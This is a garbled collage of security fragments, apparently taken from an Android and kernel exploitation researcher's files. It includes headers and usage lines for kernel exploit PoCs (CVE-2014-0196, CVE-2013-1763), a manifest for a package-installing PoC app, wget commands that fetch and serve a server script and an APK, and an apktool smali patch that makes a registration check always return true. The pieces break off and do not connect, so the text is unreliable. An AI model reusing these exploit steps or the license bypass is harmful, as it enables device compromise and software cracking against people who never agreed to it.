O-LLVM + Overclok's Kryptonite Obfuscation with Android NDK.
/* CVE-2014-0196 DOS PoC [Written May 5th, 2014]
 * by DigitalCold <digitalcold0@gmail.com>
 *
 * Note: this crashes my i686 Gentoo system running 3.12.14
 * and an old Backtrack 5r3 running 3.2.6. Any advice on how to gain
 * code exec would be greatly appreciated.
 *
 * Usage: gcc -O2 -o pty pty.c -lutil && ./pty
 *
 * CVE: http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-0196.html
[ 0.000000] Linux version 4.5.0-rc2+ (fuzion24@bitbox) (gcc version 6.0.0 20160221 (experimental) (GCC) ) #4 SMP Mon Feb 22 14:12:37 EST 2016
[ 0.000000] Command line: root=/dev/sda
[ 0.000000] x86/fpu: Legacy x87 FPU detected.
[ 0.000000] x86/fpu: Using 'lazy' FPU context switches.
[ 0.000000] e820: BIOS-provided physical RAM map:
[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000007fffdfff] usable
[ 0.000000] BIOS-e820: [mem 0x000000007fffe000-0x000000007fffffff] reserved
package com.test.rootchecker;
import java.io.File;
import java.util.List;
import java.util.Map;
import android.content.Context;
import android.content.pm.ApplicationInfo;
public class RootChecker {
#! /bin/sh
# Opens Chrome Canary (or Chromium, or whatever CHROME_PATH points to) in incognito mode.
# Uses a very popular user agent.
# Sets Tor as the SOCKS proxy.
CHROME_PATH="/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary"
tor &> /dev/null & \
/*
 * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
 *
 * Ported by fuzion24
 *
 * Tested on Nexus 4
 * shell@mako:/ $ cat /proc/version
 * Linux version 3.4.0-perf-gf43c3d9 (android-build@vpbs1.mtv.corp.google.com) (gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 SMP PREEMPT Mon Jun 17 16:55:05 PDT 2013
 * shell@mako:/data/local/tmp $ ./diag_sock_exploit
 * Sock diag handlers c11d8048
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.packagemanager.poc"
    android:versionCode="1"
    android:versionName="1.0" >
    <uses-sdk android:minSdkVersion="8" />
    <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.DELETE_PACKAGES" />
wget https://gist.githubusercontent.com/Fuzion24/6dd7552a1c594911416f/raw/server.rb
wget https://s3.amazonaws.com/uploads.hipchat.com/35420/441986/5xRGtuTBdBnuisN/twitter.apk
gem install sinatra --no-rdoc
ruby server.rb ./twitter.apk
Running apktool d APKNAME.apk produces output that can be modified, repackaged and run again.
isRegistered() is hardcoded to return false.
Changing
const/4 v0, 0x0
to
const/4 v0, 0x1
makes isRegistered ALWAYS return true, so the application is always told that it is registered.